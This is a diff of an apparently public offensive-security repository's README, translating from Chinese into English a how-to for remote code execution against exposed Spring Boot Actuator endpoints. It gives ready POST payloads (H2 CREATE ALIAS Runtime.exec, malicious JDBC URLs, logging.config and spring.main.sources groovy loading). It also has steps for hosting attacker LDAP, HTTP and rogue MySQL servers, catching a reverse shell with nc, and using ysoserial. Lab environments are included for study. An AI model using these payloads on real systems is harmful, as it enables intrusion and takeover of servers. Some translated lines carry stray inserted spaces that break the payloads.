[springboot-realm-jndi-rce.py](https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/springboot-realm-jndi-rce.py) 脚本中的目标地址,RMI 地址、端口等信息,然后在自己控制的服务器上运行。 +Modify the target address in the [springboot-realm-jndi-rce.py](https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/springboot-realm-jndi-rce.py) script according to the actual situation, RMI address, port and other information, and then run on the server under your control. -#### 漏洞原理: +#### Vulnerability principle: -1. 利用 jolokia 调用 createJNDIRealm 创建 JNDIRealm -2. 设置 connectionURL 地址为 RMI Service URL -3. 设置 contextFactory 为 RegistryContextFactory -4. 停止 Realm -5. 启动 Realm 以触发指定 RMI 地址的 JNDI 注入,造成 RCE 漏洞 +1. Use jolokia to call createJNDIRealm to create JNDIRealm +2. Set the connectionURL address to RMI Service URL +3. Set contextFactory to RegistryContextFactory +4. Stop Realm +5. Start Realm to trigger JNDI injection of specified RMI address, causing RCE vulnerability -#### 漏洞分析: +#### Vulnerability analysis: -​ [Yet Another Way to Exploit Spring Boot Actuators via Jolokia](https://static.anquanke.com/download/b/security-geek-2019-q1/article-10.html) +​ [Yet Another Way to Exploit Spring Boot Actuators via Jolokia](https://static.anquanke.com/download/b/security-geek-2019-q1/article-10.html) -#### 漏洞环境: +#### Vulnerability environment: [repository/springboot-jolokia-logback-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-jolokia-logback-rce) -正常访问: +Normal access: ``` http://127.0.0.1:9094/env @@ -1181,45 +1183,45 @@ http://127.0.0.1:9094/env -### 0x06:restart h2 database query RCE +### 0x06: restart h2 database query RCE -#### 利用条件: +#### Use conditions: -- 可以 POST 请求目标网站的 `/env` 接口设置属性 -- 可以 POST 请求目标网站的 `/restart` 接口重启应用 -- 存在 `com.h2database.h2` 依赖(版本要求暂未知) +- You can POST request to the `/env` interface of the target website to set properties +- You can POST request to the `/restart` interface of the target website to restart the application +- There is a `com.h2database.h2` dependency (version requirements are not yet known) -#### 利用方法: +#### How to use: -##### 步骤一:设置 spring.datasource.hikari.connection-test-query 属性 +##### Step 1: Set the spring.datasource.hikari.connection-test-query property -> ⚠️ 下面payload 中的 'T5' 方法每一次执行命令后都需要更换名称 (如 T6) ,然后才能被重新创建使用,否则下次 restart 重启应用时漏洞不会被触发 +> ⚠️ The 'T5' method in the following payload needs to be renamed (such as T6) every time the command is executed, and then it can be recreated and used, otherwise the vulnerability will not be triggered when the application is restarted next time -spring 1.x(无回显执行命令) +spring 1.x (execute command without echo) ``` POST /env Content-Type: application/x-www-form-urlencoded -spring.datasource.hikari.connection-test-query=CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc'); +spring.datasource.hikari.connection-test-query=CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe' ,'c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc'); ``` -spring 2.x(无回显执行命令) +spring 2.x (execute command without echo) ``` POST /actuator/env Content-Type: application/json -{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc');"} +{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti',' me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc'); "} ``` -##### 步骤二:重启应用 +##### Step 2: Restart the application spring 1.x @@ -1239,26 +1241,26 @@ Content-Type: application/json -#### 漏洞原理: +#### Vulnerability principle: -1. spring.datasource.hikari.connection-test-query 属性被设置为一条恶意的 `CREATE ALIAS` 创建自定义函数的 SQL 语句 -2. 其属性对应 HikariCP 数据库连接池的 connectionTestQuery 配置,定义一个新数据库连接之前被执行的 SQL 语句 -3. restart 重启应用,会建立新的数据库连接 -4. 如果 SQL 语句中的自定义函数还没有被执行过,那么自定义函数就会被执行,造成 RCE 漏洞 +1. The spring.datasource.hikari.connection-test-query property is set to a malicious `CREATE ALIAS` SQL statement to create a custom function +2. Its properties correspond to the connectionTestQuery configuration of the HikariCP database connection pool, defining the SQL statement to be executed before a new database connection +3. restart to restart the application, a new database connection will be established +4. If the custom function in the SQL statement has not been executed, the custom function will be executed, causing RCE vulnerability -#### 漏洞分析: +#### Vulnerability analysis: -​ [remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database) +​ [remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed -actuators-and-h2-database) -#### 漏洞环境: +#### Vulnerability environment: [repository/springboot-h2-database-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-h2-database-rce) -正常访问: +Normal access: ``` http://127.0.0.1:9096/actuator/env @@ -1266,57 +1268,57 @@ http://127.0.0.1:9096/actuator/env -### 0x07:h2 database console JNDI RCE +### 0x07: h2 database console JNDI RCE -#### 利用条件: +#### Use conditions: -- 存在 `com.h2database.h2` 依赖(版本要求暂未知) -- spring 配置中启用 h2 console `spring.h2.console.enabled=true` -- 目标可以请求攻击者的服务器(请求可出外网) -- JNDI 注入受目标 JDK 版本影响,jdk < 6u201/7u191/8u182/11.0.1(LDAP 方式) +- There is a `com.h2database.h2` dependency (version requirements are not yet known) +- Enable h2 console in spring configuration `spring.h2.console.enabled=true` +- The target can request the attacker's server (the request can go out of the Internet) +- JNDI injection is affected by the target JDK version, jdk < 6u201/7u191/8u182/11.0.1 (LDAP method) -#### 利用方法: +#### How to use: -##### 步骤一:访问路由获得 jsessionid +##### Step 1: Access routing to get jsessionid -直接访问目标开启 h2 console 的默认路由 `/h2-console`,目标会跳转到页面 `/h2-console/login.jsp?jsessionid=xxxxxx`,记录下实际的 `jsessionid=xxxxxx` 值。 +Directly access the target and open the default route `/h2-console` of h2 console, the target will jump to the page `/h2-console/login.jsp?jsessionid=xxxxxx`, record the actual value of `jsessionid=xxxxxx`. -##### 步骤二:准备要执行的 Java 代码 +##### Step 2: Prepare the Java code to be executed -编写优化过后的用来反弹 shell 的 [Java 示例代码](https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/JNDIObject.java) `JNDIObject.java`, +Write an optimized [Java sample code](https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/JNDIObject.java) `JNDIObject.java` for rebounding the shell, -使用兼容低版本 jdk 的方式编译: +Compile with a method compatible with lower versions of jdk: ```bash javac -source 1.5 -target 1.5 JNDIObject.java ``` -然后将生成的 `JNDIObject.class` 文件拷贝到 **步骤二** 中的网站根目录。 +Then copy the generated `JNDIObject.class` file to the website root directory in **Step 2**. -##### 步骤三:托管 class 文件 +##### Step 3: Manage class files -在自己控制的 vps 机器上开启一个简单 HTTP 服务器,端口尽量使用常见 HTTP 服务端口(80、443) +Open a simple HTTP server on the vps machine controlled by yourself, and use common HTTP service ports (80, 443) as much as possible ```bash -# 使用 python 快速开启 http server +# Use python to quickly open http server python2 -m SimpleHTTPServer 80 python3 -m http.server 80 ``` -将**步骤二**中编译好的 class 文件拷贝到 HTTP 服务器根目录。 +Copy the class file compiled in **Step 2** to the root directory of the HTTP server. -##### 步骤四:架设恶意 ldap 服务 +##### Step 4: Set up a malicious ldap service -下载 [marshalsec](https://github.com/mbechler/marshalsec) ,使用下面命令架设对应的 ldap 服务: +Download [marshalsec](https://github.com/mbechler/marshalsec), use the following command to set up the corresponding ldap service: ```bash java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://your-vps-ip:80/#JNDIObject 1389 @@ -1324,9 +1326,9 @@ java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http:// -##### 步骤五:监听反弹 shell 的端口 +##### Step 5: Listen to the port of the rebound shell -一般使用 nc 监听端口,等待反弹 shell +Generally use nc to monitor the port and wait for the rebound shell ```bash nc -lv 443 @@ -1334,9 +1336,9 @@ nc -lv 443 -##### 步骤六:发包触发 JNDI 注入 +##### Step 6: Send a package to trigger JNDI injection -根据实际情况,替换下面数据中的 `jsessionid=xxxxxx`、`www.example.com` 和 `ldap://your-vps-ip:1389/JNDIObject` +According to the actual situation, replace `jsessionid=xxxxxx`, `www.example.com` and `ldap://your-vps-ip:1389/JNDIObject` in the following data ```bash POST /h2-console/login.do?jsessionid=xxxxxx @@ -1349,17 +1351,17 @@ language=en&setting=Generic+H2+%28Embedded%29&name=Generic+H2+%28Embedded%29&dri -#### 漏洞分析: +#### Vulnerability analysis: -​ [Spring Boot + H2数据库JNDI注入](https://mp.weixin.qq.com/s/Yn5U8WHGJZbTJsxwUU3UiQ) +​ [Spring Boot + H2 database JNDI injection](https://mp.weixin.qq.com/s/Yn5U8WHGJZbTJsxwUU3UiQ) -#### 漏洞环境: +#### Vulnerability environment: [repository/springboot-h2-database-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-h2-database-rce) -正常访问: +Normal access: ``` http://127.0.0.1:9096/h2-console @@ -1367,54 +1369,54 @@ http://127.0.0.1:9096/h2-console -### 0x08:mysql jdbc deserialization RCE +### 0x08: mysql jdbc deserialization RCE -#### 利用条件: +#### Use conditions: -- 可以 POST 请求目标网站的 `/env` 接口设置属性 -- 可以 POST 请求目标网站的 `/refresh` 接口刷新配置(存在 `spring-boot-starter-actuator` 依赖) -- 目标环境中存在 `mysql-connector-java` 依赖 -- 目标可以请求攻击者的服务器(请求可出外网) +- You can POST request to the `/env` interface of the target website to set properties +- You can POST to request the `/refresh` interface of the target website to refresh the configuration (there is `spring-boot-starter-actuator` dependency) +- `mysql-connector-java` dependency exists in the target environment +- The target can request the attacker's server (the request can go out of the Internet) -#### 利用方法: +#### How to use: -##### 步骤一:查看环境依赖 +##### Step 1: Check the environment dependencies -GET 请求 `/env` 或 `/actuator/env`,搜索环境变量(classpath)中是否有 `mysql-connector-java` 关键词,并记录下其版本号(5.x 或 8.x); +GET requests `/env` or `/actuator/env`, search for the keyword `mysql-connector-java` in the environment variable (classpath), and record its version number (5.x or 8.x); -搜索并观察环境变量中是否存在常见的反序列化 gadget 依赖,比如 `commons-collections`、`Jdk7u21`、`Jdk8u20` 等; +Search and observe whether there are common deserialization gadget dependencies in the environment variables, such as `commons-collections`, `Jdk7u21`, `Jdk8u20`, etc.; -搜索 `spring.datasource.url` 关键词,记录下其 `value` 值,方便后续恢复其正常 jdbc url 值。 +Search for the keyword `spring.datasource.url`, and record its `value` value, so as to restore its normal jdbc url value later. -##### 步骤二:架设恶意 rogue mysql server +##### Step 2: Set up a malicious rogue mysql server -在自己控制的服务器上运行 [springboot-jdbc-deserialization-rce.py](https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/springboot-jdbc-deserialization-rce.py) 脚本,并使用 [ysoserial](https://github.com/frohoff/ysoserial) 自定义要执行的命令: +Run the [springboot-jdbc-deserialization-rce.py](https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/springboot-jdbc-deserialization-rce.py) script on the server you control, and Use [ysoserial](https://github.com/frohoff/ysoserial) to customize the command to be executed: ```bash java -jar ysoserial.jar CommonsCollections3 calc> payload.ser ``` -在脚本**同目录下**生成 `payload.ser` 反序列化 payload 文件,供脚本使用。 +Generate `payload.ser` in the **same directory** of the script to deserialize the payload file for use by the script. -##### 步骤三:设置 spring.datasource.url 属性 +##### Step 3: Set the spring.datasource.url property -> ⚠️ 修改此属性会暂时导致网站所有的正常数据库服务不可用,会对业务造成影响,请谨慎操作! +> ⚠️ Modifying this attribute will temporarily cause all normal database services of the website to be unavailable, which will affect the business, please operate with caution! -mysql-connector-java 5.x 版本设置**属性值**为: +mysql-connector-java 5.x version sets **property value** as: ``` jdbc:mysql://your-vps-ip:3306/mysql?characterEncoding=utf8&useSSL=false&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true ``` - mysql-connector-java 8.x 版本设置**属性值**为: + mysql-connector-java 8.x version sets **property value** as: ``` jdbc:mysql://your-vps-ip:3306/mysql?characterEncoding=utf8&useSSL=false&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true @@ -1428,7 +1430,7 @@ spring 1.x POST /env Content-Type: application/x-www-form-urlencoded -spring.datasource.url=对应属性值 +spring.datasource.url=corresponding attribute value ``` spring 2.x @@ -1437,12 +1439,12 @@ spring 2.x POST /actuator/env Content-Type: application/json -{"name":"spring.datasource.url","value":"对应属性值"} +{"name":"spring.datasource.url","value":"corresponding attribute value"} ``` -##### 步骤四:刷新配置 +##### Step 4: Refresh configuration spring 1.x @@ -1462,47 +1464,47 @@ Content-Type: application/json -##### 步骤五:触发数据库查询 +##### Step 5: Trigger database query -尝试访问网站已知的数据库查询的接口,例如: `/product/list` ,或者寻找其他方式,主动触发源网站进行数据库查询,然后漏洞会被触发 +Try to access the known database query interface of the website, for example: `/product/list`, or find other ways to actively trigger the source website to perform database query, and then the vulnerability will be triggered -##### 步骤六:恢复正常 jdbc url +##### Step 6: Return to normal jdbc url -反序列化漏洞利用完成后,使用 **步骤三** 的方法恢复 **步骤一** 中记录的 `spring.datasource.url` 的原始 `value` 值 +After the deserialization exploit is completed, use the method of **Step 3** to restore the original `value` value of `spring.datasource.url` recorded in **Step 1** -#### 漏洞原理: +#### Vulnerability principle: -1. spring.datasource.url 属性被设置为外部恶意 mysql jdbc url 地址 -2. refresh 刷新后设置了一个新的 spring.datasource.url 属性值 -3. 当网站进行数据库查询等操作时,会尝试使用恶意 mysql jdbc url 建立新的数据库连接 -4. 然后恶意 mysql server 就会在建立连接的合适阶段返回反序列化 payload 数据 -5. 目标依赖的 mysql-connector-java 就会反序列化设置好的 gadget,造成 RCE 漏洞 +1. The spring.datasource.url property is set to the external malicious mysql jdbc url address +2. A new spring.datasource.url property value is set after refresh +3. When the website performs database query and other operations, it will try to use malicious mysql jdbc url to establish a new database connection +4. The malicious mysql server will then return deserialized payload data at the appropriate stage of connection establishment +5. The mysql-connector-java that the target depends on will deserialize the set gadget, causing RCE vulnerability -#### 漏洞分析: +#### Vulnerability analysis: -​ [New-Exploit-Technique-In-Java-Deserialization-Attack](https://i.blackhat.com/eu-19/Thursday/eu-19-Zhang-New-Exploit-Technique-In-Java-Deserialization-Attack.pdf) +​ [New-Exploit-Technique-In-Java-Deserialization-Attack](https://i.blackhat.com/eu-19/Thursday/eu-19-Zhang-New-Exploit-Technique-In-Java-Deserialization -Attack.pdf) -#### 漏洞环境: +#### Vulnerability environment: -> 需要配置 application.properties 中的 spring.datasource.url、spring.datasource.username、spring.datasource.password,保证可以正常连上 mysql 数据库,否则程序启动时就会报错退出 +> You need to configure spring.datasource.url, spring.datasource.username, spring.datasource.password in application.properties to ensure that you can connect to the mysql database normally, otherwise the program will report an error and exit when it starts [repository/springboot-mysql-jdbc-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-mysql-jdbc-rce) -正常访问: +Normal access: ``` http://127.0.0.1:9097/actuator/env ``` -发送完 payload 后触发漏洞: +Trigger the vulnerability after sending the payload: ``` http://127.0.0.1:9097/product/list @@ -1510,27 +1512,27 @@ http://127.0.0.1:9097/product/list -### 0x09:restart logging.config logback JNDI RCE +### 0x09: restart logging.config logback JNDI RCE -#### 利用条件: +#### Use conditions: -- 可以 POST 请求目标网站的 `/env` 接口设置属性 -- 可以 POST 请求目标网站的 `/restart` 接口重启应用 -- 普通 JNDI 注入受目标 JDK 版本影响,jdk < 6u201/7u191/8u182/11.0.1(LDAP),但相关环境可绕过 -- ⚠️ 目标可以请求攻击者的 HTTP 服务器(请求可出外网),否则 restart 会导致程序异常退出 -- ⚠️ HTTP 服务器如果返回含有畸形 xml 语法内容的文件,会导致程序异常退出 -- ⚠️ JNDI 服务返回的 object 需要实现 `javax.naming.spi.ObjectFactory` 接口,否则会导致程序异常退出 +- You can POST request to the `/env` interface of the target website to set properties +- You can POST request to the `/restart` interface of the target website to restart the application +- Ordinary JNDI injection is affected by the target JDK version, jdk < 6u201/7u191/8u182/11.0.1(LDAP), but the related environment can be bypassed +- ⚠️ The target can request the attacker's HTTP server (the request can go out of the Internet), otherwise restart will cause the program to exit abnormally +- ⚠️ If the HTTP server returns a file containing malformed xml syntax content, the program will exit abnormally +- ⚠️ The object returned by the JNDI service needs to implement the `javax.naming.spi.ObjectFactory` interface, otherwise the program will exit abnormally -#### 利用方法: +#### How to use: -##### 步骤一:托管 xml 文件 +##### Step 1: Host the xml file -在自己控制的 vps 机器上开启一个简单 HTTP 服务器,端口尽量使用常见 HTTP 服务端口(80、443) +Open a simple HTTP server on the vps machine controlled by yourself, and use common HTTP service ports (80, 443) as much as possible ```bash -# 使用 python 快速开启 http server +# Use python to quickly open http server python2 -m SimpleHTTPServer 80 python3 -m http.server 80 @@ -1538,19 +1540,19 @@ python3 -m http.server 80 -在根目录放置以 `xml` 结尾的 `example.xml` 文件,实际内容要根据步骤二中使用的 JNDI 服务来确定: +Place the `example.xml` file ending with `xml` in the root directory. The actual content depends on the JNDI service used in step 2: ```xml - + ``` -##### 步骤二:托管恶意 ldap 服务及代码 +##### Step 2: Host malicious ldap service and code -参考[文章](https://landgrey.me/blog/21/),修改 [JNDIExploit](https://github.com/feihong-cs/JNDIExploit) 并启动(也可以使用其他方法): +Refer to [article](https://landgrey.me/blog/21/), modify [JNDIExploit](https://github.com/feihong-cs/JNDIExploit) and start (you can also use other methods): ```bash java -jar JNDIExploit-1.0-SNAPSHOT.jar -i your-vps-ip @@ -1558,7 +1560,7 @@ java -jar JNDIExploit-1.0-SNAPSHOT.jar -i your-vps-ip -##### 步骤三:设置 logging.config 属性 +##### Step 3: Set logging.config Property spring 1.x @@ -1580,7 +1582,7 @@ Content-Type: application/json -##### 步骤四:重启应用 +##### Step 4: Restart the application spring 1.x @@ -1600,29 +1602,29 @@ Content-Type: application/json -#### 漏洞原理: +#### Vulnerability principle: -1. 目标机器通过 logging.config 属性设置 logback 日志配置文件 URL 地址 -2. restart 重启应用后,程序会请求 URL 地址获得恶意 xml 文件内容 -3. 目标机器使用 saxParser.parse 解析 xml 文件 (这里导致了 xxe 漏洞) -4. xml 文件中利用 `logback` 依赖的 `insertFormJNDI` 标签,设置了外部 JNDI 服务器地址 -5. 目标机器请求恶意 JNDI 服务器,导致 JNDI 注入,造成 RCE 漏洞 +1. The target machine sets the logback log configuration file URL address through the logging.config property +2. restart After restarting the application, the program will request the URL address to obtain the content of the malicious xml file +3. The target machine uses saxParser.parse to parse the xml file (this leads to the xxe vulnerability) +4. Use the `insertFormJNDI` tag that `logback` relies on in the xml file to set the address of the external JNDI server +5. The target machine requests a malicious JNDI server, resulting in JNDI injection, resulting in an RCE vulnerability -#### 漏洞分析: +#### Vulnerability analysis: -​ [spring boot actuator rce via jolokia](https://xz.aliyun.com/t/4258) +​ [spring boot actuator rce via jolokia](https://xz.aliyun.com/t/4258) -​ https://landgrey.me/blog/21/ +​ https://landgrey.me/blog/21/ -#### 漏洞环境: +#### Vulnerability environment: [repository/springboot-restart-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-restart-rce) -正常访问: +Normal access: ``` http://127.0.0.1:9098/actuator/env @@ -1630,26 +1632,26 @@ http://127.0.0.1:9098/actuator/env -### 0x0A:restart logging.config groovy RCE +### 0x0A: restart logging.config groovy RCE -#### 利用条件: +#### Use conditions: -- 可以 POST 请求目标网站的 `/env` 接口设置属性 -- 可以 POST 请求目标网站的 `/restart` 接口重启应用 -- ⚠️ 目标可以请求攻击者的 HTTP 服务器(请求可出外网),否则 restart 会导致程序异常退出 -- ⚠️ HTTP 服务器如果返回含有畸形 groovy 语法内容的文件,会导致程序异常退出 -- ⚠️ 环境中需要存在 groovy 依赖,否则会导致程序异常退出 +- You can POST request to the `/env` interface of the target website to set properties +- You can POST request to the `/restart` interface of the target website to restart the application +- ⚠️ The target can request the attacker's HTTP server (the request can go out of the Internet), otherwise restart will cause the program to exit abnormally +- ⚠️ If the HTTP server returns a file containing malformed groovy syntax content, the program will exit abnormally +- ⚠️ There needs to be groovy dependencies in the environment, otherwise the program will exit abnormally -#### 利用方法: +#### How to use: -##### 步骤一:托管 groovy 文件 +##### Step 1: Host the groovy files -在自己控制的 vps 机器上开启一个简单 HTTP 服务器,端口尽量使用常见 HTTP 服务端口(80、443) +Open a simple HTTP server on the vps machine controlled by yourself, and use common HTTP service ports (80, 443) as much as possible ```bash -# 使用 python 快速开启 http server +# Use python to quickly open http server python2 -m SimpleHTTPServer 80 python3 -m http.server 80 @@ -1657,7 +1659,7 @@ python3 -m http.server 80 -在根目录放置以 `groovy` 结尾的 `example.groovy` 文件,内容为需要执行的 groovy 代码,比如: +Place the `example.groovy` file ending with `groovy` in the root directory, and the content is the groovy code that needs to be executed, for example: ```xml Runtime.getRuntime().exec("open -a Calculator") @@ -1666,7 +1668,7 @@ Runtime.getRuntime().exec("open -a Calculator") -##### 步骤二:设置 logging.config 属性 +##### Step 2: Set logging.config properties spring 1.x @@ -1688,7 +1690,7 @@ Content-Type: application/json -##### 步骤三:重启应用 +##### Step 3: Restart the application spring 1.x @@ -1708,20 +1710,20 @@ Content-Type: application/json -#### 漏洞原理: +#### Vulnerability principle: -1. 目标机器通过 logging.config 属性设置 logback 日志配置文件 URL 地址 -2. restart 重启应用后,程序会请求设置的 URL 地址 -3. `logback-classic` 组件的 `ch.qos.logback.classic.util.ContextInitializer.java` 代码文件逻辑中会判断 url 是否以 `groovy` 结尾 -4. 如果 url 以 `groovy` 结尾,则最终会执行文件内容中的 groovy 代码,造成 RCE 漏洞 +1. The target machine sets the logback log configuration file URL address through the logging.config property +2. restart After restarting the application, the program will request the set URL address +3. The `ch.qos.logback.classic.util.ContextInitializer.java` code file logic of the `logback-classic` component will determine whether the url ends with `groovy` +4. If the url ends with `groovy`, the groovy code in the file content will eventually be executed, causing an RCE vulnerability -#### 漏洞环境: +#### Vulnerability environment: [repository/springboot-restart-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-restart-rce) -正常访问: +Normal access: ``` http://127.0.0.1:9098/actuator/env @@ -1729,26 +1731,26 @@ http://127.0.0.1:9098/actuator/env -### 0x0B:restart spring.main.sources groovy RCE +### 0x0B: restart spring.main.sources groovy RCE -#### 利用条件: +#### Use conditions: -- 可以 POST 请求目标网站的 `/env` 接口设置属性 -- 可以 POST 请求目标网站的 `/restart` 接口重启应用 -- ⚠️ 目标可以请求攻击者的 HTTP 服务器(请求可出外网),否则 restart 会导致程序异常退出 -- ⚠️ HTTP 服务器如果返回含有畸形 groovy 语法内容的文件,会导致程序异常退出 -- ⚠️ 环境中需要存在 groovy 依赖,否则会导致程序异常退出 +- You can POST request to the `/env` interface of the target website to set properties +- You can POST request to the `/restart` interface of the target website to restart the application +- ⚠️ The target can request the attacker's HTTP server (the request can go out of the Internet), otherwise restart will cause the program to exit abnormally +- ⚠️ If the HTTP server returns a file containing malformed groovy syntax content, the program will exit abnormally +- ⚠️ There needs to be groovy dependencies in the environment, otherwise the program will exit abnormally -#### 利用方法: +#### How to use: -##### 步骤一:托管 groovy 文件 +##### Step 1: Host the groovy files -在自己控制的 vps 机器上开启一个简单 HTTP 服务器,端口尽量使用常见 HTTP 服务端口(80、443) +Open a simple HTTP server on the vps machine controlled by yourself, and use common HTTP service ports (80, 443) as much as possible ```bash -# 使用 python 快速开启 http server +# Use python to quickly open http server python2 -m SimpleHTTPServer 80 python3 -m http.server 80 @@ -1756,7 +1758,7 @@ python3 -m http.server 80 -在根目录放置以 `groovy` 结尾的 `example.groovy` 文件,内容为需要执行的 groovy 代码,比如: +Place the `example.groovy` file ending with `groovy` in the root directory, and the content is the groovy code that needs to be executed, for example: ```xml Runtime.getRuntime().exec("open -a Calculator") @@ -1765,7 +1767,7 @@ Runtime.getRuntime().exec("open -a Calculator") -##### 步骤二:设置 spring.main.sources 属性 +##### Step 2: Set the spring.main.sources property spring 1.x @@ -1787,7 +1789,7 @@ Content-Type: application/json -##### 步骤三:重启应用 +##### Step 3: Restart the application spring 1.x @@ -1807,20 +1809,20 @@ Content-Type: application/json -#### 漏洞原理: +#### Vulnerability principle: -1. 目标机器可以通过 spring.main.sources 属性来设置创建 ApplicationContext 的额外源的 URL 地址 -2. restart 重启应用后,程序会请求设置的 URL 地址 -3. `spring-boot` 组件中的 `org.springframework.boot.BeanDefinitionLoader.java` 文件代码逻辑中会判断 url 是否以 `.groovy` 结尾 -4. 如果 url 以 `.groovy` 结尾,则最终会执行文件内容中的 groovy 代码,造成 RCE 漏洞 +1. The target machine can set the URL address of the additional source that creates the ApplicationContext through the spring.main.sources property +2. restart After restarting the application, the program will request the set URL address +3. The `org.springframework.boot.BeanDefinitionLoader.java` file code logic in the `spring-boot` component will determine whether the url ends with `.groovy` +4. If the url ends with `.groovy`, the groovy code in the file content will eventually be executed, causing an RCE vulnerability -#### 漏洞环境: +#### Vulnerability environment: [repository/springboot-restart-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-restart-rce) -正常访问: +Normal access: ``` http://127.0.0.1:9098/actuator/env @@ -1828,26 +1830,26 @@ http://127.0.0.1:9098/actuator/env -### 0x0C:restart spring.datasource.data h2 database RCE +### 0x0C: restart spring.datasource.data h2 database RCE -#### 利用条件: +#### Use conditions: -- 可以 POST 请求目标网站的 `/env` 接口设置属性 -- 可以 POST 请求目标网站的 `/restart` 接口重启应用 -- 环境中需要存在 `h2database`、`spring-boot-starter-data-jpa` 相关依赖 -- ⚠️ 目标可以请求攻击者的 HTTP 服务器(请求可出外网),否则 restart 会导致程序异常退出 -- ⚠️ HTTP 服务器如果返回含有畸形 h2 sql 语法内容的文件,会导致程序异常退出 +- You can POST request to the `/env` interface of the target website to set properties +- You can POST request to the `/restart` interface of the target website to restart the application +- Relevant dependencies of `h2database` and `spring-boot-starter-data-jpa` need to exist in the environment +- ⚠️ The target can request the attacker's HTTP server (the request can go out of the Internet), otherwise restart will cause the program to exit abnormally +- ⚠️ If the HTTP server returns a file containing malformed h2 sql syntax content, the program will exit abnormally -#### 利用方法: +#### How to use: -##### 步骤一:托管 sql 文件 +##### Step 1: Manage the sql file -在自己控制的 vps 机器上开启一个简单 HTTP 服务器,端口尽量使用常见 HTTP 服务端口(80、443) +Open a simple HTTP server on the vps machine controlled by yourself, and use common HTTP service ports (80, 443) as much as possible ```bash -# 使用 python 快速开启 http server +# Use python to quickly open http server python2 -m SimpleHTTPServer 80 python3 -m http.server 80 @@ -1855,17 +1857,17 @@ python3 -m http.server 80 -在根目录放置以任意名字的文件,内容为需要执行的 h2 sql 代码,比如: +Place a file with any name in the root directory, the content is the h2 sql code that needs to be executed, for example: -> ⚠️ 下面payload 中的 'T5' 方法只能 restart 执行一次;后面 restart 需要更换新的方法名称 (如 T6) 和设置新的 sql URL 地址,然后才能被 restart 重新使用,否则第二次 restart 重启应用时会导致程序异常退出 +> ⚠️ The 'T5' method in the following payload can only be executed once by restart; the subsequent restart needs to be replaced with a new method name (such as T6) and a new sql URL address, and then it can be reused by restart, otherwise the second restart will restart the application will cause the program to exit abnormally ```xml -CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('/bin/bash','-c','open -a Calculator'); +CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2 ,m3});}');CALL T5('/bin/bash','-c','open -a Calculator'); ``` -##### 步骤二:设置 spring.datasource.data 属性 +##### Step 2: Set the spring.datasource.data property spring 1.x @@ -1887,7 +1889,7 @@ Content-Type: application/json -##### 步骤三:重启应用 +##### Step 3: Restart the application spring 1.x @@ -1907,22 +1909,20 @@ Content-Type: application/json -#### 漏洞原理: +#### Vulnerability principle: -1. 目标机器可以通过 spring.datasource.data 属性来设置 jdbc DML sql 文件的 URL 地址 -2. restart 重启应用后,程序会请求设置的 URL 地址 -3. `spring-boot-autoconfigure` 组件中的 `org.springframework.boot.autoconfigure.jdbc.DataSourceInitializer.java` 文件代码逻辑中会使用 `runScripts` 方法执行请求 URL 内容中的 h2 database sql 代码,造成 RCE 漏洞 +1. The target machine can set the URL address of the jdbc DML sql file through the spring.datasource.data property +2. restart After restarting the application, the program will request the set URL address +3. The `org.springframework.boot.autoconfigure.jdbc.DataSourceInitializer.java` file code logic in the `spring-boot-autoconfigure` component will use the `runScripts` method to execute the h2 database sql code in the content of the request URL, causing RCE loophole -#### 漏洞环境: +#### Vulnerability environment: [repository/springboot-restart-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-restart-rce) -正常访问: +Normal access: ``` http://127.0.0.1:9098/actuator/env ``` - - diff --git a/repository/springboot-eureka-xstream-rce/pom.xml b/repository/springboot-eureka-xstream-rce/pom.xml index ddeeda2..1f109d8 100644 --- a/repository/springboot-eureka-xstream-rce/pom.xml +++ b/repository/springboot-eureka-xstream-rce/pom.xml @@ -11,7 +11,7 @@ 1.8 1.4.7.RELEASE - 1.4.0.RELEASE + 4.0.4 1.1.3.RELEASE 1.2.0.RELEASE diff --git a/repository/springboot-mysql-jdbc-rce/pom.xml b/repository/springboot-mysql-jdbc-rce/pom.xml index 27fb1bd..914aeea 100644 --- a/repository/springboot-mysql-jdbc-rce/pom.xml +++ 